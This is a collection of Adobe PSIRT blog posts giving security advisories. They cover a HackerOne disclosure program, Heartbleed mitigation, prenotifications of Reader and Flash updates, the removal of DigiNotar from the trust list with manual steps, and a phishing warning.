Posts in Category "Uncategorized"

Adobe Launches Web Application Vulnerability Disclosure Program on HackerOne

In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform. Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score. We invite security researchers to view the disclosure guidelines available here: https://hackerone.com/adobe.

Adobe continues to welcome the coordinated disclosure of security issues affecting desktop products and enterprise on-premise solutions by notifying our Product Security Incident Response Team (PSIRT@adobe.com).

Pieter Ockers
Security Program Manager, PSIRT

Heartbleed Update

Last week, industry security researchers announced a flaw in the OpenSSL encryption software library, known as “Heartbleed,” which can be used to cause a vulnerable system to reveal up to 64k of memory to an attacker.

Adobe has evaluated the Creative Cloud and its related services (including Behance and Digital Publishing Suite), the Marketing Cloud solutions and products (including Analytics, Analytics Premium and Experience Manager), EchoSign, Acrobat.com, the Adobe.com store, and other Adobe services. All Adobe internet-facing services known to have been using a version of OpenSSL containing the Heartbleed vulnerability have been mitigated. We are continuing our analysis of Adobe internet-facing servers to identify and remediate any remaining Heartbleed-related risks.

Some Adobe products and services do not bundle OpenSSL (such as ColdFusion** , Experience Manager and Experience Manager On-Demand) but are frequently deployed by customers on-premise or with third party web servers. We advise these customers to test for the Heartbleed vulnerability (CVE-2014-0160) against their deployment and configuration. If necessary, follow the recommendations provided by the OpenSSL security advisory as appropriate.

At this time, Adobe does not plan to initiate a password reset in response to the Heartbleed vulnerability; however it is always a good practice to change passwords from time to time. We strongly recommend that you change your Adobe password if you use the same user ID and password as your AdobeID and password on multiple websites, so that a compromise of your username and password on a non-Adobe service does not put your Adobe ID at risk.

** Update: ColdFusion does ship a version of OpenSSL that is not vulnerable to the Heartbleed vulnerability.

Prenotification: Upcoming Security Updates for Adobe Reader and Acrobat (APSB13-15)

A prenotification Security Advisory has been posted in regards to upcoming Adobe Reader and Acrobat updates scheduled for Tuesday, May 14, 2013.

We will continue to provide updates on the upcoming release via the Security Advisory section of the Adobe website as well as the Adobe PSIRT blog.

This posting is provided “AS IS” with no warranties and confers no rights.

 

Adobe Reader and Acrobat Vulnerability Report

Adobe is aware of a report of a vulnerability in Adobe Reader and Acrobat XI (11.0.1) and earlier versions being exploited in the wild. We are currently investigating this report and assessing the risk to our customers. We will provide an update as soon as we have more information. Please continue monitoring the Adobe PSIRT blog for the latest information.

This posting is provided “AS IS” with no warranties and confers no rights.

Clickjacking issue in Adobe Flash Player Settings Manager

Adobe is aware of a report describing a clickjacking issue related to the online Flash Player Settings Manager. We have resolved the issue with a change to the Flash Player Settings Manager SWF file hosted on the Adobe website. No user action or Flash Player product update are required.

This posting is provided “AS IS” with no warranties and confers no rights.

Prenotification: Security Update for Flash Player

A Flash Player update is scheduled for release tomorrow, September 21, 2011. This update will address critical security issues in the product as well as an important universal cross-site scripting issue that is reportedly being exploited in the wild in targeted attacks.

We will continue to provide updates on the upcoming release via the Security Advisory section of the Adobe website as well as the Adobe PSIRT blog.

This posting is provided “AS IS” with no warranties and confers no rights.

DigiNotar removed from Adobe Approved Trust List (AATL)

As discussed on the Security Matters blog, the Adobe Approved Trust List (AATL) has been updated to remove the certificate authority DigiNotar. Users of Adobe Reader and Acrobat X (version 10.x) will be automatically updated to this list. A future product update of Adobe Reader and Acrobat version 9.x will enable dynamic updates of the AATL. In the meantime, users of Adobe Reader and Acrobat 9 can manually remove DigiNotar using instructions provided in the September 9 blog post.

This posting is provided “AS IS” with no warranties and confers no rights.

Update on DigiNotar removal from the Adobe Approved Trust List (AATL)

An update on the removal of the DigiNotar Qualified CA certificate from the Adobe Approved Trust List (AATL) following the recent DigiNotar breach has been posted on the Security Matters blog.

This posting is provided “AS IS” with no warranties and confers no rights.

Update on DigiNotar and the Adobe Approved Trust List (AATL)

We are in the process of removing the DigiNotar Qualified CA certificate from the Adobe Approved Trust List (AATL) and will post an update on this action tomorrow.

In the meantime, users can manually remove these certificates from Adobe Reader and Acrobat* by following these steps:
(*Note that the AATL is only supported in Adobe Reader and Acrobat versions 9 and X.)
 
Adobe Reader Version 9
1)   Open Adobe Reader.
2)   Open the Document Menu and choose Manage Trusted Identities.
3)   Drop down the ‘Display’ box that reads ‘Contacts’ and choose ‘Certificates.’
4)   Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5)   Click Delete, and then confirm the deletion by clicking OK.
  
Adobe Acrobat Version 9
1)   Open Adobe Acrobat.
2)   Open the Advanced Menu and choose Manage Trusted Identities.
3)   Drop down the ‘Display’ box that reads ‘Contacts’ and choose ‘Certificates.’
4)   Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5)   Click Delete, and then confirm the deletion by clicking OK.
 
Adobe Reader and Acrobat X
1)   Open Adobe Reader or Acrobat.
2)   Open the Edit Menu->Protection->Manage Trusted Identities.
3)   Drop down the ‘Display’ box that reads ‘Contacts’ and choose ‘Certificates.’
4)   Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5)   Click Delete, and then confirm the deletion by clicking OK.

This posting is provided “AS IS” with no warranties and confers no rights.

Alert: Adobe Acrobat/Reader Upgrade Email Spam/Phishing Scam

With the availability of Adobe Acrobat X solutions this week, a reminder to be cautious when receiving email messages purporting to offer a download of a new version of Adobe Acrobat or Adobe Reader sent by entities claiming to be Adobe.

Many of these emails require recipients to register and/or provide personal information. Please be aware that these emails have not been sent by Adobe or on Adobe’s behalf.

The Adobe Reader, in particular, is free software available for download directly from the Adobe Reader download page on the Adobe website at http://get.adobe.com/reader/; it is not available in any other manner via download, including via email.

Customers receiving one of these potentially malicious emails should delete the email immediately without clicking on any of the links.